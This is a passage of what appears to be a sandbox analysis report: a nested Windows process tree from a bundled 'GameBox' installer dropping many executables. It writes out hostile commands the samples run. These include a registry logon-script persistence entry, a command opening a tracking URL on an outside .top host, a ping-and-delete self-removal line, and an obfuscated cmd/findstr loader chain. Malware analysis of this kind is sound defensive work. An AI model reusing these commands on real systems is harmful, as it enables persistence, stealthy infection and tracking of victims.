                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            PID:5896
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                          9⤵
                                                                            PID:8660
                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                            9⤵
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:7580
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2HI03.tmp\{app}\vdi_compiler.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2HI03.tmp\{app}\vdi_compiler"
                                                                            9⤵
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:4804
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-2HI03.tmp\{app}\vdi_compiler.exe"
                                                                              10⤵
                                                                              • Blocklisted process makes network request
                                                                              • Checks SCSI registry key(s)
                                                                              PID:4724
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                11⤵
                                                                                  PID:6592
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping localhost -n 4
                                                                                  11⤵
                                                                                  • Runs ping.exe
                                                                                  PID:9136
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:4304
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-2A50L.tmp\VPN.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-2A50L.tmp\VPN.tmp" /SL5="$102EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:3184
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-J65D9.tmp\Setup.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-J65D9.tmp\Setup.exe" /silent /subid=720
                                                                          7⤵
                                                                            PID:6152
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-K37FU.tmp\Setup.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-K37FU.tmp\Setup.tmp" /SL5="$203EE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-J65D9.tmp\Setup.exe" /silent /subid=720
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in Program Files directory
                                                                              • Modifies registry class
                                                                              • Modifies system certificate store
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:5092
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                9⤵
                                                                                  PID:6696
                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                    tapinstall.exe remove tap0901
                                                                                    10⤵
                                                                                    • Checks SCSI registry key(s)
                                                                                    PID:8092
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                  9⤵
                                                                                    PID:8236
                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                      10⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      PID:8348
                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                    9⤵
                                                                                      PID:4804
                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                      9⤵
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:6120
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                              5⤵
                                                                                PID:4520
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                PID:5208
                                                                                • C:\Users\Admin\Documents\EUNbh3oT1KXvkjaFVjoJs1Dh.exe
                                                                                  "C:\Users\Admin\Documents\EUNbh3oT1KXvkjaFVjoJs1Dh.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:1788
                                                                                • C:\Users\Admin\Documents\XqGexK1ikRdGgzy_FhLw8oJZ.exe
                                                                                  "C:\Users\Admin\Documents\XqGexK1ikRdGgzy_FhLw8oJZ.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2272
                                                                                  • C:\Users\Admin\Documents\XqGexK1ikRdGgzy_FhLw8oJZ.exe
                                                                                    C:\Users\Admin\Documents\XqGexK1ikRdGgzy_FhLw8oJZ.exe
                                                                                    7⤵
                                                                                      PID:7040
                                                                                  • C:\Users\Admin\Documents\jNefXP7_0QLSDsVXXFznYC2X.exe
                                                                                    "C:\Users\Admin\Documents\jNefXP7_0QLSDsVXXFznYC2X.exe"
                                                                                    6⤵
                                                                                      PID:6576
                                                                                      • C:\Users\Admin\Documents\jNefXP7_0QLSDsVXXFznYC2X.exe
                                                                                        "C:\Users\Admin\Documents\jNefXP7_0QLSDsVXXFznYC2X.exe" -q
                                                                                        7⤵
                                                                                          PID:7476
                                                                                      • C:\Users\Admin\Documents\rJrLGbEanZQWeZ7o5ffpb6H9.exe
                                                                                        "C:\Users\Admin\Documents\rJrLGbEanZQWeZ7o5ffpb6H9.exe"
                                                                                        6⤵
                                                                                          PID:6568
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-C5K1G.tmp\rJrLGbEanZQWeZ7o5ffpb6H9.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-C5K1G.tmp\rJrLGbEanZQWeZ7o5ffpb6H9.tmp" /SL5="$10404,138429,56832,C:\Users\Admin\Documents\rJrLGbEanZQWeZ7o5ffpb6H9.exe"
                                                                                            7⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:6916
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-H6K35.tmp\Setup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-H6K35.tmp\Setup.exe" /Verysilent
                                                                                              8⤵
                                                                                              • Drops file in Program Files directory
                                                                                              PID:6992
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                9⤵
                                                                                                • Loads dropped DLL
                                                                                                • Enumerates connected drives
                                                                                                • Modifies system certificate store
                                                                                                PID:5156
                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281722 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                  10⤵
                                                                                                    PID:4772
                                                                                          • C:\Users\Admin\Documents\LuQu1gCMAt_odep7Dol2s6mE.exe
                                                                                            "C:\Users\Admin\Documents\LuQu1gCMAt_odep7Dol2s6mE.exe"
                                                                                            6⤵
                                                                                              PID:6560
                                                                                              • C:\Users\Admin\Documents\LuQu1gCMAt_odep7Dol2s6mE.exe
                                                                                                "C:\Users\Admin\Documents\LuQu1gCMAt_odep7Dol2s6mE.exe"
                                                                                                7⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:7648
                                                                                            • C:\Users\Admin\Documents\KGy5OmV6Qng3jC224fI1Aw0P.exe
                                                                                              "C:\Users\Admin\Documents\KGy5OmV6Qng3jC224fI1Aw0P.exe"
                                                                                              6⤵
                                                                                                PID:6552
                                                                                              • C:\Users\Admin\Documents\0IM6PjyLf7JI5nI0MIf8_eEQ.exe
                                                                                                "C:\Users\Admin\Documents\0IM6PjyLf7JI5nI0MIf8_eEQ.exe"
                                                                                                6⤵
                                                                                                  PID:6544
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 660
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:6832
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 664
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:4448
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 680
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:5276
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 668
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:7116
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 888
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:6908
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 1128
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:7560
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 1108
                                                                                                    7⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    • Program crash
                                                                                                    PID:7868
                                                                                                • C:\Users\Admin\Documents\hZUvNV1IOlTIZd35n6IYTKwR.exe
                                                                                                  "C:\Users\Admin\Documents\hZUvNV1IOlTIZd35n6IYTKwR.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6536
                                                                                                • C:\Users\Admin\Documents\Z4hQ_Ms6u_1s6hna5MNMZFeU.exe
                                                                                                  "C:\Users\Admin\Documents\Z4hQ_Ms6u_1s6hna5MNMZFeU.exe"
                                                                                                  6⤵
                                                                                                    PID:6528
                                                                                                  • C:\Users\Admin\Documents\g8VfpaHUcsv8X4O6LIR7mISj.exe
                                                                                                    "C:\Users\Admin\Documents\g8VfpaHUcsv8X4O6LIR7mISj.exe"
                                                                                                    6⤵
                                                                                                      PID:6520
                                                                                                    • C:\Users\Admin\Documents\UpOg2danuLSDhZydHXL9IoU0.exe
                                                                                                      "C:\Users\Admin\Documents\UpOg2danuLSDhZydHXL9IoU0.exe"
                                                                                                      6⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:6508
                                                                                                    • C:\Users\Admin\Documents\GzQAJkxkZ3aBdEuHCdb2JVhW.exe
                                                                                                      "C:\Users\Admin\Documents\GzQAJkxkZ3aBdEuHCdb2JVhW.exe"
                                                                                                      6⤵
                                                                                                        PID:6500
                                                                                                        • C:\Users\Admin\Documents\GzQAJkxkZ3aBdEuHCdb2JVhW.exe
                                                                                                          C:\Users\Admin\Documents\GzQAJkxkZ3aBdEuHCdb2JVhW.exe
                                                                                                          7⤵
                                                                                                            PID:5752
                                                                                                          • C:\Users\Admin\Documents\GzQAJkxkZ3aBdEuHCdb2JVhW.exe
                                                                                                            C:\Users\Admin\Documents\GzQAJkxkZ3aBdEuHCdb2JVhW.exe
                                                                                                            7⤵
                                                                                                              PID:1640
                                                                                                          • C:\Users\Admin\Documents\CrxhvsSXZxOXY4uSo_M7qxYz.exe
                                                                                                            "C:\Users\Admin\Documents\CrxhvsSXZxOXY4uSo_M7qxYz.exe"
                                                                                                            6⤵
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:6492
                                                                                                          • C:\Users\Admin\Documents\nHnAE_TrltTyWMHZgtpPS5Ma.exe
                                                                                                            "C:\Users\Admin\Documents\nHnAE_TrltTyWMHZgtpPS5Ma.exe"
                                                                                                            6⤵
                                                                                                              PID:6484
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 660
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:5044
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 708
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:5888
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 696
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:4812
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 652
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:4500
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1144
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:7440
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1092
                                                                                                                7⤵
                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                • Program crash
                                                                                                                PID:7680
                                                                                                            • C:\Users\Admin\Documents\IBAWvexLirYMFY4LXtQ1WE9W.exe
                                                                                                              "C:\Users\Admin\Documents\IBAWvexLirYMFY4LXtQ1WE9W.exe"
                                                                                                              6⤵
                                                                                                                PID:6472
                                                                                                              • C:\Users\Admin\Documents\rCwl21ok6zt_ry9SiurFKjs5.exe
                                                                                                                "C:\Users\Admin\Documents\rCwl21ok6zt_ry9SiurFKjs5.exe"
                                                                                                                6⤵
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:6464
                                                                                                              • C:\Users\Admin\Documents\Q5EyLzwtGqIo_CJObQhWmwUA.exe
                                                                                                                "C:\Users\Admin\Documents\Q5EyLzwtGqIo_CJObQhWmwUA.exe"
                                                                                                                6⤵
                                                                                                                  PID:6456
                                                                                                                  • C:\Users\Admin\AppData\Roaming\8879511.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\8879511.exe"
                                                                                                                    7⤵
                                                                                                                      PID:7288
                                                                                                                    • C:\Users\Admin\AppData\Roaming\5573524.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\5573524.exe"
                                                                                                                      7⤵
                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                      PID:6812
                                                                                                                  • C:\Users\Admin\Documents\uAhsuAMGpkC7SnLUpZ0NtjOE.exe
                                                                                                                    "C:\Users\Admin\Documents\uAhsuAMGpkC7SnLUpZ0NtjOE.exe"
                                                                                                                    6⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:6448
                                                                                                                  • C:\Users\Admin\Documents\0lLkNC99EDDDcBn0HrSKw3GD.exe
                                                                                                                    "C:\Users\Admin\Documents\0lLkNC99EDDDcBn0HrSKw3GD.exe"
                                                                                                                    6⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:6440
                                                                                                                    • C:\Users\Admin\Documents\0lLkNC99EDDDcBn0HrSKw3GD.exe
                                                                                                                      C:\Users\Admin\Documents\0lLkNC99EDDDcBn0HrSKw3GD.exe
                                                                                                                      7⤵
                                                                                                                        PID:6600
                                                                                                                    • C:\Users\Admin\Documents\u0JnYrJAgV4XyBfVdP5OVuHQ.exe
                                                                                                                      "C:\Users\Admin\Documents\u0JnYrJAgV4XyBfVdP5OVuHQ.exe"
                                                                                                                      6⤵
                                                                                                                        PID:6432
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5164
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmp8374_tmp.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmp8374_tmp.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2916
                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                          7⤵
                                                                                                                            PID:7356
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                            7⤵
                                                                                                                              PID:7644
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd
                                                                                                                                8⤵
                                                                                                                                  PID:7944
                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                    9⤵
                                                                                                                                      PID:8096
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                      9⤵
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      PID:5316
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                        10⤵
                                                                                                                                          PID:7580
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            11⤵
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:5036
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                              12⤵
                                                                                                                                                PID:1420
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  13⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:6612
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    14⤵
                                                                                                                                                      PID:7804
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        15⤵
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:6704
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          16⤵
                                                                                                                                                            PID:3752
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              17⤵
                                                                                                                                                                PID:6120
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  18⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:6076
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    19⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:6552
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      20⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:996
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:7024
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:8644
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            23⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:8984
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              24⤵
                                                                                                                                                                                PID:7160
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  25⤵
                                                                                                                                                                                    PID:8368
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      26⤵
                                                                                                                                                                                        PID:7008
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          27⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:4944
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            28⤵
                                                                                                                                                                                              PID:8312
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                29⤵
                                                                                                                                                                                                  PID:8468
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                      PID:8588
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                          PID:8680
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                              PID:8400
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                33⤵
                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                PID:3752
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                    PID:4720
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      35⤵
                                                                                                                                                                                                                        PID:9192
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                          PID:7160
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                            37⤵
                                                                                                                                                                                                                              PID:8716
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                38⤵
                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                PID:8368
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                  39⤵
                                                                                                                                                                                                                                    PID:8852
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                      40⤵
                                                                                                                                                                                                                                        PID:7688
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                          41⤵
                                                                                                                                                                                                                                            PID:8156
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
